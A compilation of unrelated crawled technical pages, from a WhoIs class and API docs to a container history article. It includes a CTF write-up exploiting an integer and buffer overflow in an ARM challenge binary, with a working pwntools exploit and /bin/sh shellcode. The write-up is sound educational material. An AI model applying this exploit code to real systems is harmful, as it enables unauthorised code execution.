This is a simple MFC class for Internet-based WhoIs processing. WhoIs is an Internet function used to determine information about specific IP addresses and domain names. A number of companies, such as Network Solutions and Internic, keep WHOIS databases online at all times. While many freeware applications exist to display this data, there is little information or code available that actually does it. Many applications need access to this information, and this class provides a simple way to query these databases. The code to use this class to access this information would look like the following:

// Create class instance
CWhoIsClass whoIs;
// Set address to be queried
CString szAddress = "Microsoft.com";
// Call actual function
CString szResult = whoIs.WhoIs(szAddress);

There are only two public functions for the class:

CString WhoIs(LPCSTR szAddress);
void SetWhoIsServer(LPCSTR szServerName);

The first is used to obtain the WhoIs information. The data is returned as a string that is typically a few hundred characters long. The second is used to change WhoIs servers. The class defaults to the whois.internic.net server; you can change it to whatever whois server best fits your needs. The Internic and Network Solutions servers host mostly US sites. Other servers exist to handle military addresses and international addresses. You should probably expect to query two or more servers to obtain the best information. When querying a whois server, you can request either domain name information (e.g. microsoft.com) or IP address information (e.g. 216.98.67.204). For example, the following would be valid address queries:

whois("microsoft.com")
whois("codedeveloper.com")

but whois("") would be an invalid query request. Most whois servers appear to accept the domain portion (minus the "www." part) and return valid information. The query syntax for IP address requests varies by whois server. The whois.internic.net server accepts pure IP address queries.
The whois.networksolutions.com server, however, requires that the word "host" precede the IP portion. If you use the Network Solutions whois server, which sometimes returns more complete information, your queries would have to take the following form:

whois("host 216.98.67.204")

If the "host" part is missing, no data will be returned when using the whois.networksolutions.com server. Using the code in your project also requires that you include the source and header files for the CWhoIsClass. This would usually look like this:

#include "WhoIsClass.h"
#include "WhoIsClass.cpp"

The code was compiled with VC++ 6.0, but should work with earlier versions as well. It uses MFC sockets for processing, and therefore requires an AfxSocketInit() call prior to class use. It assumes a connection to the Internet already exists. That's it. Not very complicated, but it solved my problem. Perhaps it will help others as well.
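The server-dependent quirks described above are easy to centralize before calling WhoIs(). As a rough sketch (the helper below is hypothetical, not part of CWhoIsClass, and uses std::string rather than CString so it stands alone):

```cpp
#include <string>

// Hypothetical helper: build the query string expected by a given whois
// server. whois.networksolutions.com wants IP queries prefixed with "host ",
// while whois.internic.net accepts the bare IP address.
std::string FormatWhoIsQuery(const std::string& server, const std::string& address)
{
    // Crude IP test: the address contains nothing but digits and dots.
    bool isIp = !address.empty() &&
                address.find_first_not_of("0123456789.") == std::string::npos;
    if (isIp && server == "whois.networksolutions.com")
        return "host " + address;
    return address;
}
```

The string returned by a helper like this would then be passed to WhoIs() exactly as in the examples above.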
http://www.codeproject.com/KB/IP/whois.aspx
Uploading and downloading of components in the ftrack.server location is handled separately from the rest of the API.

Uploading files

Uploading files is done in three steps.

- A signed PUT URL is fetched from the server.
- The returned URL and headers are used to upload the file.
- The upload is finished by adding the component to the ftrack.server location.

Obtaining PUT Metadata

Issue a Get upload metadata operation to retrieve the PUT metadata to use.

Uploading the file

Example call using CURL:

curl -X PUT \
  --header "Content-Type: image/jpeg" \
  --header "Content-Disposition: attachment; filename=\"image.png\"" \
  --upload-file image.png \
  "<signed-put-url>"

The response may vary depending on which media server is used, but you can assume that an HTTP response of 200 indicates that the upload was successful.

Finalizing the upload

After the file has been uploaded, it should be marked as present in the ftrack server location. This can be done with a call to the API endpoint, creating a ComponentLocation. The component can now also be used for various other operations, such as adding it to a version, encoding it to a reviewable format or adding it as a thumbnail.

Example request body:

[
    {
        "action": "create",
        "entity_type": "ComponentLocation",
        "entity_data": {
            "location_id": "3a372bde-05bc-11e4-8908-20c9d081909b",
            "component_id": "<component-id>"
        }
    }
]

Computing the checksum

The checksum is used as the Content-MD5 header and should contain the base64-encoded 128-bit MD5 digest of the message (without the headers) according to RFC 1864. This can be used as a message integrity check to verify that the data is the same data that was originally sent. Although it is optional, we recommend using the checksum mechanism as an end-to-end integrity check. For reference, this is the implementation in the python client.
def _compute_checksum(fp):
    '''Return checksum for file.'''
    buf_size = 8192
    hash_obj = hashlib.md5()
    spos = fp.tell()
    s = fp.read(buf_size)
    while s:
        hash_obj.update(s)
        s = fp.read(buf_size)
    base64_digest = base64.encodestring(hash_obj.digest())
    if base64_digest[-1] == '\n':
        base64_digest = base64_digest[0:-1]
    fp.seek(spos)
    return base64_digest
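The reference implementation above is from the Python 2 era (base64.encodestring was removed in Python 3.9). A minimal Python 3 equivalent of the same RFC 1864 computation might look like this:

```python
import base64
import hashlib


def compute_content_md5(data: bytes) -> str:
    """Base64-encoded 128-bit MD5 digest, suitable for a Content-MD5 header."""
    digest = hashlib.md5(data).digest()
    return base64.b64encode(digest).decode("ascii")


# Example: the header value for a small payload.
print(compute_content_md5(b"hello"))  # XUFAKrxLKna5cZ2REBfFkg==
```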
http://help.ftrack.com/en/articles/1040508-data-transfer
Arm Exploitation

According to my test on a Raspberry Pi, the stack and heap are not executable. So the exploit only works if the binary runs without ASLR and DEP enforced, i.e., the challenge environment. For debugging this challenge, I recommend reading [1] first.

Vulnerability Analysis

There is a very important data structure:

struct vector {
    u8 id;
    u8 len;
    u8 vec_buf[len];
}

As noted in [3], the structure ends with a buffer of variable length; this is not standard C syntax. The final payload looks like this:

{id1, len1, [ vec_buf1 ]}, {id2, len2, [ vec_buf2 ]}, {id3, len3, [ vec_buf3 ]}

Pre-Processing

There is a global_context variable at 0x2205c, which will be used heavily later. In the function at 0x11028, different function pointers are invoked according to the vector id. Next I will introduce fun0, fun2, fun6 and fun8, the functions involved in the exploit.

fun0(char *input_buffer, u8 *curLength, char *global_context) // at 0x10919
{
    u8 cur = *curLength;
    if(input_buffer[0] != '\x00') {
        // code to update curLength
        return 0;
    } else {
        u8 vec_length = (u8)input_buffer[cur + 1];
        if(vec_length == 2) {
            char ch1 = vec_buf[0];
            char ch2 = vec_buf[1];
            global_context[4] = ch1 + ch2;
            *curLength = *curLength + 4;
            global_context[0] |= 1;
        }
    }
}

fun2 is a little bit complicated. To pass the final validity check at the end, we have to somehow execute the following code:

if(val <= (bufLen + 2) * 8) {
    // update curLength;
    global_context[0] |= 4;
    return 0;
}

The purpose of fun6 is confusing to me. Its functionality is given below:

fun6(char *input_buffer, u8 *curLength, char *global_context) // at 0x10da0
{
    if((global_context[0] & 0x40) != 0) {
        // update curLength;
        return 0;
    }
    if(cur_vec->bufLen == 1) {
        global_context[2] = (cur_vec->vec_buf[0]) >> 2;
        global_context[0] |= 0x40;
        // update curLength;
        return 0;
    }
}

According to my final test, fun6 seems to have no effect on the final exploit.
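The payload described above is a simple type-length-value encoding, so building test inputs is straightforward. A sketch in Python (the helper name is mine, not from the challenge binary):

```python
def make_vector(vec_id: int, buf: bytes) -> bytes:
    """Pack one {id, len, vec_buf[len]} record."""
    assert 0 <= vec_id <= 0xff and len(buf) <= 0xff
    return bytes([vec_id, len(buf)]) + buf

# Several records concatenated, matching the payload layout above.
payload = make_vector(0, b"\x02\x04") + make_vector(2, b"\x01\x02\x03")
```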
But I do not understand why [3] and [4] both take this function into consideration.

fun8 copies the vector buffer into the global_context:

fun8(char *input_buffer, u8 *curLength, char *global_context) // at 0x10f59
{
    if((global_context[0] & 0x80) != 0) {
        // update curLength;
        return 0;
    }
    if(cur_vec->bufLen == 0) {
        // some code
        return 1;
    } else {
        void *dst = global_context + 0x68;
        copy(dst, 0x100, cur_vec->vec_buf, cur_vec->len);
        *(global_context + 0x64) = cur_vec->len;
        global_context[0] |= 0x80;
        // update curLength;
        return 0;
    }
}

Vulnerability Digging

Then we come to the critical part of this challenge. The function at 0x11200 is the key function in this exploit. The pseudocode in [3] is well written, so I will not take space to reproduce all of it here. In fun8, a payload is copied into global_context, and it follows the same pattern:

{id1, len1, [ vec_buf1 ]}, {id2, len2, [ vec_buf2 ]}, {id3, len3, [ vec_buf3 ]}

This time, those vectors will be sorted according to the vector id. The algorithm for identifying each vector is given below:

curLength = 0;
while(curLength < *(global_context + 0x64)) {
    // local_input is a copy of the payload in vector 8
    recordVecByID(local_input, &curLength, array + 3 * (*(local_input + curLength)));
}

void recordVecByID(local_input, u8 *curLength, BYTE *dstAddress)
{
    length = *curLength;
    dstAddress[0] = *((BYTE *)(local_input + length));      // vec id
    dstAddress[1] = *((BYTE *)(local_input + length + 1));  // vec length
    dstAddress[2] = length;                                 // current total length
    *curLength = *curLength + dstAddress[1] + 2;
}

At first glance, it seems there is no problem with this code. But there is actually an integer overflow vulnerability here: curLength is a u8 and the vector length is under the attacker's control, which means we can create overlapping vectors during exploitation. Then we come to the sorting part of this challenge.
curLength = 0;
for(i = 0; i <= 19; i++) {
    if(ID i exists) {
        vecLen = *(array + i*3 + 1);
        copy(global_context + 0x68, vecLen + 2, local_context + *(array + i*3 + 2), vecLen + 2);
    }
}

As noted above, the problem is again that vecLen comes from user input, so it is easy to trigger a buffer overflow here. The annoying part of this challenge is that we have to trigger the buffer overflow 101 times. For the first 100 times, the destination address is a global address; on the 101st time, the destination address is a stack address.

Exploitation Plan

From the pseudocode above, we can see that vec->len can be a large value that makes the u8 total length wrap around to a value smaller than in the previous round. Our target is to make the payload stay unchanged after each round. I think the example in [3] explains this clearly enough, so I will just describe it briefly here.

For a normal process in sub_11200:

{0, 0}, {15, 3, 0xd0, 15, 15}, {2, 3, 2, 2, 2}, {1, 4, 1, 1, 1, 1}

After the sorting algorithm, the sorted vectors will be:

{0, 0}, {15, 3, 0xd0, 15, 15}, {1, 4, 1, 1, 1, 1}, {2, 3, 2, 2, 2}

For a malicious process in sub_11200:

{0, 0}, {15, 5, 0xd0, 15, 15, 3, 4}, {2, 3, 2, 2, 2}, {1, 0xf7, 1, 1}

The parsing process on the vectors will be:

Total bytes 0: {0, 0}
Total bytes 2 (0+2): {15, 5, 0xd0, 15, 15, 3, 4}
Total bytes 9 (2+5+2): {2, 3, 2, 2, 2}
Total bytes 14 (9+3+2): {1, 0xf7, 1, 1} with 0xf5 extra padding 0's
Total bytes 7 (14 + 0xf7 + 2, truncated to a u8): {3, 4, 2, 3, 2, 2} (the overlapping vector)

The copying sequence from the local buffer to the target address is arranged according to the vector id, i.e., {0, 15, 1, 2, 3}. At this point, we can form a rough exploitation plan for this challenge:

(1) Use the vector of id 1 to create an overlapping vector (id 3).
(2) Use the vector of id 2 to trigger the buffer overflow vulnerability.
(3) Use the overlapping vector to restore the payload to its original state.
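The cursor arithmetic in the walkthrough above can be checked directly. A small sketch, using Python purely as a calculator for the u8 wraparound:

```python
def next_cursor(cur: int, vec_len: int) -> int:
    # curLength is a u8, so advancing past a huge attacker-controlled
    # vec_len wraps around instead of failing a bounds check.
    return (cur + vec_len + 2) & 0xff

cur = 0                       # {0, 0}
cur = next_cursor(cur, 0)     # 2  -> {15, 5, ...}
cur = next_cursor(cur, 5)     # 9  -> {2, 3, ...}
cur = next_cursor(cur, 3)     # 14 -> {1, 0xf7, ...}
cur = next_cursor(cur, 0xf7)  # 7  -> wrapped back inside vector 15's buffer
```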
Exploit

The final exploit is also given in my GitHub repo. [5]

from pwn import *
import pwnlib

DEBUG = int(sys.argv[1]);
if(DEBUG == 1):
    env = {"LD_PRELOAD":"./libc.so.6"};
    r = process(["qemu-arm-static", "./ld-linux-armhf.so.3", "./balong"], env=env);
elif(DEBUG == 2):
    env = {"LD_PRELOAD":"./libc.so.6"};
    r = process(["qemu-arm-static", "-g", "12345", "./ld-linux-armhf.so.3", "./balong"], env=env);
    raw_input("Debug");

context.arch = "thumb"
shellcode = "";
shellcode += asm('eors r2, r2');
shellcode += asm('add r0, pc, 8');
shellcode += asm('push {r0, r2}');
shellcode += asm('mov r1, sp');
shellcode += asm('movs r7, 11');
shellcode += asm('svc 1');

def makeVector(vecid, length, vec):
    ans = "";
    ans = p8(vecid) + p8(length) + vec;
    return ans;

def fun0():
    vector = p8(2) + p8(4);
    return makeVector(0, 2, vector);

def fun2():
    binaryBuf = "00" + "00000011" + "1111" + "1101" + "0101" + "00";
    vector = translate(binaryBuf);
    return makeVector(2, 3, vector);

def translate(buf):
    length = len(buf);
    ans = '';
    for i in range(0, length/8):
        tmpBuf = buf[8*i: 8*i + 8];
        val = int(tmpBuf, 2);
        ans += chr(val);
    return ans;

def fun6():
    return makeVector(6, 1, "\x01");

def fun8():
    buf = "";
    buf += p8(0) + p8(3) + "\x10\x00\x40";
    x = 39;
    y = 44;
    buf += p8(15) + p8(x);
    tmpbuf = "\xd0" + shellcode + "/bin/sh\x00";
    tmpbuf = tmpbuf.ljust(x-2, 'A');
    tmpbuf += p8(3) + p8(y+4);
    buf += tmpbuf;
    buf += p8(2) + p8(y) + p32(0x220cd) * (y/4);
    buf += p8(1) + p8(0xfa-y);
    log.info("Buf length: %d" % len(buf));
    return makeVector(8, len(buf), buf);

def exploit():
    payload = "\x00";
    payload += fun0();
    payload += fun2();
    #payload += fun6();
    payload += fun8();
    r.send(payload);
    r.interactive();

exploit();

Conclusion

At this point, I still do not know what the point of fun6 is. Even when I comment out the fun6 call in my exploit, the exploit still seems to work. Maybe I need some time to take a deeper look at the code. More information about this challenge can be found in [6].

Reference

[1] [2] [3] [4] [5] [6]
https://dangokyo.me/2018/09/22/0ctf2018-qual-mightydragon-pwn-write-up/
And so, there is a library mouse. It has mouse.double_click(button='left'), but it doesn't work on Ubuntu; that is, I run the Python file with sudo, but it doesn't click.

import mouse as ms
import keyboard as k
from time import sleep

while True:
    if ms.is_pressed(button='left') and not k.is_pressed("shift"):
        clicked = 0
        while True:
            sleep(0.01)
            ms.double_click(button="left")
            clicked += 1
            print(f"{clicked} clicked!")
            if not ms.is_pressed(button='left'):
                break

Comments:
Кзлч Вв (2021-11-25 06:50:20): Well, I did import mouse as ms @Enikeyschik
Кзлч Вв (2021-11-25 06:50:58): The plan is: while the left button is held down, it clicks; when it is released, it doesn't click.
Эникейщик (2021-11-25 06:53:45): But how can you click if the button is held down?
Кзлч Вв (2021-11-25 06:55): I'll try to remove it
Эникейщик (2021-11-25 06:48:56): if ms.is_pressed(button='left') ?????
https://www.tutorialfor.com/questions-382114.htm
SignalAction(), SignalAction_r()

Examine and/or specify actions for signals

Synopsis:

#include <sys/neutrino.h>

int SignalAction( pid_t pid,
                  void ( * sigstub)(),
                  int signo,
                  const struct sigaction * act,
                  struct sigaction * oact );

int SignalAction_r( pid_t pid,
                    void ( * sigstub)(),
                    int signo,
                    const struct sigaction * act,
                    struct sigaction * oact );

POSIX signals

The signals are defined in <signal.h>, and so are these global variables:
- char * const sys_siglist[] - An array of signal names.
- int sys_nsig - The number of entries in the sys_siglist array.

There are 32 POSIX 1003.1a signals, including:
- SIGHUP - Hangup.
- SIGINT - Interrupt.
- SIGQUIT - Quit.
- SIGILL - Illegal instruction (not reset when caught).
- SIGTRAP - Trace trap (not reset when caught).
- SIGIOT - IOT instruction.
- SIGABRT - Used by abort().
- SIGEMT - EMT instruction.
- SIGCONT - Continue a stopped process.
- SIGTTIN - Attempted background tty read.
- SIGTTOU - Attempted background tty write.

There are 16 POSIX 1003.1b realtime signals, including:
- SIGRTMIN - First realtime signal.
- SIGRTMAX - Last realtime signal.

The entire range of signals goes from _SIGMIN (1) to _SIGMAX (64).

Signal actions

If act isn't NULL, then the action for the specified signal is modified. If oact isn't NULL, the previous action is stored in the structure it points to. You can use various combinations of act and oact to query or set (or both) the action for a signal.

The structure sigaction contains, among others, the members sa_handler, sa_sigaction, sa_mask and sa_flags. The sa_handler and sa_sigaction members of act are implemented as a union, and share common storage. They differ only in their prototype, with sa_handler being used for POSIX 1003.1a signals, and sa_sigaction being used for POSIX 1003.1b queued realtime signals.

The values stored using either name can be one of:
- function - The address of a signal-catching function. See below for details.
- SIG_DFL - Use the default action for the signal:
  - SIGCHLD, SIGIO, SIGURG, and SIGWINCH -- ignore the signal (SIG_IGN).
  - SIGSTOP -- stop the process.
  - SIGCONT -- continue the program.
  - All other signals -- kill the process.
- SIG_IGN - Ignore the signal. Setting SIG_IGN for a signal that's pending discards all pending signals, whether blocked or not. New signals are discarded. If your process ignores SIGCHLD, its children won't enter the zombie state and the process can't use wait() or waitpid() to wait on their deaths.

When you specify a handler, you must provide the address of a signal stub handler for sigstub. This is a small piece of code in the user's space that interfaces the user's signal handler to the kernel. The library provides a standard one, __signalstub().

- union sigval si_value - A value associated with the signal, provided by the generator of the signal.

Blocking states

These calls don't block.

Returns:

The only difference between these functions is the way they indicate errors:
- SignalAction() - If an error occurs, -1 is returned and errno is set. Any other value returned indicates success.
- SignalAction_r() - EOK is returned on success. This function does NOT set errno. If an error occurs, any value in the Errors section may be returned.

Errors:
- EPERM - The process doesn't have permission to change the signal actions of the specified process.
- ESRCH - The process indicated by pid doesn't exist.

Classification:

See also:

abort(), ChannelCreate(), kill(), longjmp(), siglongjmp(), signal(), sigaction(), SignalKill(), SignalProcmask(), sigqueue(), sigsetjmp(), SyncMutexLock(), ThreadCreate(), wait(), waitpid()
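The dispositions described above (catch with a handler, SIG_IGN, SIG_DFL) are the POSIX model, so they can be illustrated with Python's signal module on any Unix; this is a generic sketch, not QNX-specific code:

```python
import os
import signal

received = []

def handler(signo, frame):
    # A signal-catching function, analogous to sa_handler above.
    received.append(signo)

signal.signal(signal.SIGUSR1, handler)         # install a handler
signal.signal(signal.SIGUSR2, signal.SIG_IGN)  # ignore, like SIG_IGN

os.kill(os.getpid(), signal.SIGUSR1)  # delivered: the handler runs
os.kill(os.getpid(), signal.SIGUSR2)  # discarded

# CPython runs Python-level handlers between bytecodes; give it a moment.
for _ in range(1000):
    if received:
        break

assert received == [signal.SIGUSR1]
```

The ignored SIGUSR2 never reaches the handler, matching the SIG_IGN semantics described above.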
http://www.qnx.com/developers/docs/6.4.0/neutrino/lib_ref/s/signalaction.html
Opened 7 years ago
Closed 7 years ago

#14532 closed (wontfix)

django.views.generic.list_detail.object_list behavior with callables in extra_context

Description

When using django.views.generic.list_detail.object_list, if it is called with an extra_context parameter that contains an entry with a callable, that callable will be called when copying the extra context to the actual context. This behavior is not always wanted. In my application, the extra_context contains an object instance whose class has a custom __call__ method. Since my __call__ method has some required parameters, I get an error when trying to display the page using the view. The callable should only be called if it is a function. If the user of object_list wants a callable object in the extra_context, then the user should call the object instance when adding the object to the context dictionary. I changed the code in django/views/generic/list_detail.py on lines 93 to 96 to:

import types
if isinstance(value, types.FunctionType):
    c[key] = value()
else:
    c[key] = value

Function-based generic views have been deprecated in favor of class-based generic views. Complications with the interpretations of extra_context are one (of many) reasons for this.
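The distinction the proposed patch relies on (plain function vs. object with a __call__ method) can be illustrated with a small sketch; the class name here is hypothetical:

```python
import types

def plain_function():
    return "called"

class CustomCallable:
    # A class with a __call__ method that requires an extra argument,
    # as described in the ticket.
    def __call__(self, required_arg):
        return required_arg

obj = CustomCallable()

# Both are callable...
assert callable(plain_function) and callable(obj)

# ...but only the plain function is a FunctionType, which is the test
# the patch uses to decide whether to invoke the value.
assert isinstance(plain_function, types.FunctionType)
assert not isinstance(obj, types.FunctionType)
```

Under the original behavior the view would call obj() with no arguments and raise a TypeError, which is exactly the failure the ticket reports.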
https://code.djangoproject.com/ticket/14532
Using the Get-WmiObject Cmdlet

Retrieving Data Using WMI

For example, suppose you need information from the Win32_BIOS class. OK:

Get-WmiObject win32_bios

You get the idea: just call Get-WmiObject followed by the class name. Ah, you say, but what if that class is located on a remote computer? No problem; just add the -computername parameter followed by - you guessed it - the name of the remote computer (atl-fs-01):

Get-WmiObject win32_bios -computername atl-fs-01

Still not convinced? Good point: we did say that, by default, Get-WmiObject connects to the root\cimv2 namespace. Is there any way to connect to a class found in a different namespace? Of course there is: just include the -namespace parameter followed by the complete namespace path (e.g., root\ccm, not just ccm). For example, this command returns information from the SMS_Client class, which resides in the root\ccm namespace:

Get-WmiObject sms_client -namespace root\ccm -computername atl-fs-01

It should go without saying that you can use other cmdlets in conjunction with Get-WmiObject (although we seem to have said it anyway). For example, this command retrieves information from the CCM_InstalledComponent class on the remote computer atl-fs-01. The command then pipes that data to Select-Object, which filters out all properties except three: DisplayName, Name, and Version. In turn, that filtered data is passed to Sort-Object, which sorts the information by DisplayName. Here's what the command looks like:

Get-WmiObject -computername atl-fs-01 ccm_installedcomponent | Select-Object displayname, name, version | Sort-Object displayname

And here's the kind of data you get back:

displayname name version
----------- ---- -------
CCM Framework CcmFramework 2.50.4160.2000
CCM Policy Agent CcmPolicyAgent 2.50.4160.2000
CCM Status Agent CcmStatusAgent 2.50.4160.2000
SMS Client Core Components SmsClient 2.50.4160.2000
SMS Inventory Agent SmsInventory 2.50.4160.2000
SMS Remote Control Agent SmsRemoteTools 2.50.4160.2000
SMS Shared Components SmsCommon 2.50.4160.2000
SMS Software Distributi... SmsSoftwareDistribution 2.50.4160.2000
SMS Software Metering A... SmsSoftwareMetering 2.50.4160.2000
SMS Software Update Agent SmsSoftwareUpdate 2.50.4160.2000
SMS Source List Update ...
SmsSourceUpdateAgent 2.50.4160.2000

On the other hand, there will likely be times when you don't want a filtered set of properties and their values; instead, you'd just like to see everything Win32_BIOS has to offer. To ensure that you get back information on all the properties (and their values) your best bet is to pipe the data returned by Get-WmiObject to Select-Object, then use the wildcard character * to indicate that you want back all the property values:

Get-WmiObject win32_bios | Select-Object *

If you don't want all the system properties (like __SUPERCLASS and __RELPATH) then add the -excludeproperty parameter and use the wildcard character to filter out any properties whose name begins with an underscore character:

Get-WmiObject win32_bios | Select-Object * -excludeproperty "_*"

Bonus tip. WMI itself is actually pretty easy to use; what isn't always so easy is figuring out the properties and methods for a specific WMI class. Check that: that's what used to be difficult. With Windows PowerShell you can simply use Get-WmiObject to connect to the class in question (for example, Win32_BIOS), and then pipe that information through the Get-Member cmdlet:

Get-WmiObject win32_bios | Get-Member

And what will that do for you? That will show you the properties and methods of Win32_BIOS.
https://technet.microsoft.com/en-us/library/ee176860.aspx
DAC_Init_TypeDef Struct Reference DAC initialization structure, common for both channels. #include <em_dac.h> DAC initialization structure, common for both channels. Field Documentation ◆ refresh Refresh interval. Only used if REFREN bit set for a DAC channel. ◆ reference Reference voltage to use. ◆ outMode Output mode. ◆ convMode Conversion mode. ◆ prescale Prescaler used to get DAC clock. Derived as follows: DACclk=HFPERclk/(2^prescale). The DAC clock should be <= 1MHz. ◆ lpEnable Enable/disable use of low pass filter on output. ◆ ch0ResetPre Enable/disable reset of prescaler on ch0 start. ◆ outEnablePRS Enable/disable output enable control by CH1 PRS signal. ◆ sineEnable Enable/disable sine mode. ◆ diff Select if single ended or differential mode.
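The prescale constraint above (DACclk = HFPERclk / 2^prescale, with the DAC clock at or below 1 MHz) can be checked numerically. This sketch assumes a hypothetical 48 MHz HFPERclk, which is not stated in the reference:

```python
# DACclk = HFPERclk / 2**prescale; find the smallest prescale value that
# keeps the DAC clock at or below the 1 MHz limit quoted above.
def min_prescale(hfper_hz, max_dac_hz=1_000_000):
    prescale = 0
    while hfper_hz / (2 ** prescale) > max_dac_hz:
        prescale += 1
    return prescale

# Hypothetical 48 MHz peripheral clock: 48 MHz / 2**6 = 750 kHz <= 1 MHz.
print(min_prescale(48_000_000))  # -> 6
```

At prescale 5 the DAC clock would be 1.5 MHz, above the limit, so 6 is the smallest valid value for this assumed input clock.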
https://docs.silabs.com/gecko-platform/3.2/emlib/api/efm32wg/struct-d-a-c-init-type-def
What is a container?

A story about picking apart how and why containers work the way they do

This post is written at and syndicated on Medium. Check out the original for a higher fidelity copy.

Containers have recently become a common way of packaging, deploying and running software across a wide set of machines in all sorts of environments. Since the initial release of Docker in March 2013[1], containers have become ubiquitous in modern software deployment, with 71% of Fortune 100 companies running them in some capacity[2]. Containers can be used for:
- Running user facing, production software
- Running a software development environment
- Compiling software with its dependencies in a sandbox
- Analysing the behaviour of software within a sandbox

Like their namesake in the shipping industry, containers are designed to easily "lift and shift" software to different environments and have that software execute in the same way across those environments. Containers have thus earned their place in the modern software development toolkit. However, to understand how container technology fits into our modern software architecture it's worth understanding how we arrived at containers, as well as how they work.

In this article we'll only be discussing Linux containers. There are container implementations on other operating systems, but we do not feel qualified to discuss those just yet. Linux containers are nevertheless in common use on both macOS and Windows, where they are implemented by way of virtualised hardware: a virtual machine.

History

The "birth" of containers was denoted by Bryan Cantrill as March 18th, 1982[3] with the addition of the chroot syscall in BSD. From the FreeBSD website[4]:

According to the SCCS logs, the chroot call was added by Bill Joy on March 18, 1982 approximately 1.5 years before 4.2BSD was released.
That was well before we had ftp servers of any sort (ftp did not show up in the source tree until January 1983). My best guess as to its purpose was to allow Bill to chroot into the /4.2BSD build directory and build a system using only the files, include files, etc contained in that tree. That was the only use of chroot that I remember from the early days. — Dr. Marshall Kirk Mckusick

chroot is used to put a process into a "changed root"; a new root filesystem that has limited or no access to the parent root filesystem. An extremely minimal chroot can be created on Linux as follows[5]:

# Get a shell
$ cd $(mktemp -d)
$ mkdir bin
$ cp $(which sh) bin/sh

# Find shared libraries required for shell
$ ldd bin/sh
	linux-vdso.so.1 (0x00007ffe69784000)
	/lib/x86_64-linux-gnu/libsnoopy.so (0x00007f6cc4c33000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6cc4a42000)
	libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f6cc4a21000)
	libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f6cc4a1c000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f6cc4c66000)

# Duplicate libraries into root
$ mkdir -p lib64 lib/x86_64-linux-gnu
$ cp /lib/x86_64-linux-gnu/libsnoopy.so \
     /lib/x86_64-linux-gnu/libc.so.6 \
     /lib/x86_64-linux-gnu/libpthread.so.0 \
     /lib/x86_64-linux-gnu/libdl.so.2 \
     lib/x86_64-linux-gnu/
$ cp /lib64/ld-linux-x86-64.so.2 lib64/

# Change into that root
$ sudo chroot . /bin/sh

# Test the chroot
# ls
/bin/sh: 1: ls: not found

There were problems with this early implementation of chroot, such as being able to exit that chroot by running cd ..[3], but these were resolved in short order. Seeking to provide better security, FreeBSD extended the chroot into the jail[3][4], which allowed running software that desired to run as root within a confined environment: root within that environment, but not root elsewhere on the system.
This work was further built upon in the Solaris operating system to provide fuller isolation from the host[3][6]:
- User separation (similar to jail)
- Filesystem separation (similar to chroot)
- A separate process space

This provided something similar to the modern concept of containers: isolated processes running on the same kernel. Later, similar work took place in the Linux kernel to isolate kernel structures on a per-process basis under "namespaces"[7].

In parallel, however, Amazon Web Services (AWS) launched their Elastic Compute Cloud (EC2) product, which took a different approach to separating out workloads: virtualising the entire hardware[3]. This has different tradeoffs; it limits exploitation of the host kernel or isolation implementation, but running an additional operating system and hypervisor means a far less efficient use of resources.

Virtualisation continued to dominate workload isolation until the company "dotcloud" (now Docker), then operating as a "platform as a service" (PAAS) offering, open sourced the software they used to run their PAAS. With that software and a large amount of luck, containers proliferated rapidly until Docker became the powerhouse it is now. Shortly after Docker released their container runtime they started expanding their product offerings into build, orchestration and server management tooling[8]. Unhappy with this, CoreOS created their own container runtime, rkt, which had the stated goal of interoperating with existing services such as systemd, following the Unix philosophy of "Write programs that do one thing and do it well"[9].

To reconcile these disparate definitions of a container the Open Container Initiative was established[10], after which Docker donated its schema and its runtime as what amounted to a de facto container standard. There are now a number of container implementations, as well as a number of standards to define their behaviour.
Definition

It might be surprising to learn that a "container" is not a real thing; rather, it is a specification. At the time of writing this specification has implementations on[11]:
- Linux
- Windows
- Solaris
- Virtual Machines

In turn, containers are expected to be[12]:
- Consumable with a set of standard, interoperable tools
- Consistent regardless of what type of software is being run
- Agnostic to the underlying infrastructure the container is being run on
- Designed in a way that makes automation easy
- Of excellent quality

There are specifications that dictate how containers should meet these principles by defining how they should be executed (the runtime specification[11]), what a container should contain (the image specification[13]) and how to distribute container "images" (the distribution specification[14]). These specifications mean that a wide variety of tools can be used to interact with containers. The canonical tool in most common use is Docker, which in addition to manipulating containers provides container build tooling and some limited orchestration of containers. Beyond Docker there are a number of other container runtimes, as well as other tools that help with building or distributing images. Lastly, there are extensions to the existing standards, such as the container networking interface, which define additional behaviour where the standards are not yet clear enough.

Implementation

While the standards give us some idea as to what a container is and how it should work, it's perhaps useful to understand how a container implementation works. Not all container runtimes are implemented in this way; notably, Kata Containers implement hardware virtualisation, as alluded to earlier with EC2. The problems being solved by containers are:
- Isolation of a process(es)
- Distribution of that process(es)
- Connecting that process(es) to other machines

With that said, let's dive in to the Docker implementation[15].
This uses a series of technologies exposed by the underlying kernel:

Kernel feature isolation: namespaces

The man namespaces page defines namespaces as follows: a namespace wraps a global system resource in an abstraction that makes it appear to the processes within the namespace that they have their own isolated instance of the global resource. Paraphrased, a namespace is a slice of the system such that, from within that slice, a process cannot see the rest of the system. A process must make a system call to the Linux kernel to change its namespace. There are several such system calls:

clone: Create a new process. When used in conjunction with CLONE_NEW* it creates a namespace of the kind specified. For example, if used with CLONE_NEWPID the process will enter a new pid namespace and become pid 1
setns: Allows the calling process to join an existing namespace, specified under /proc/[pid]/ns
unshare: Moves the calling process into a new namespace

There is a user command also called unshare which allows us to experiment with namespaces. We can put ourselves into a separate process and network namespace with the following command:

# Scratch space
$ cd $(mktemp -d)

# Fork is required to spawn new processes, and proc is mounted to give accurate process information
$ sudo unshare \
    --fork \
    --pid \
    --mount-proc \
    --net

# Here we see that we only have access to the loopback interface
root@sw-20160616-01:/tmp/tmp.XBESuNMJJS# ip addr
1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00

# Here we see that we can only see the first process (bash) and our `ps aux` invocation
root@sw-20160616-01:/tmp/tmp.XBESuNMJJS# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.3 0.0 8304 5092 pts/7 S 05:48 0:00 -bash
root 5 0.0 0.0 10888 3248 pts/7 R+ 05:49 0:00 ps aux

Docker uses several of these namespaces (pid, net, ipc, mnt and uts among them) to limit the ability of a process running in the container to see resources outside that container. These provide reasonable separation between processes such that workloads should not be able to interfere with each other.
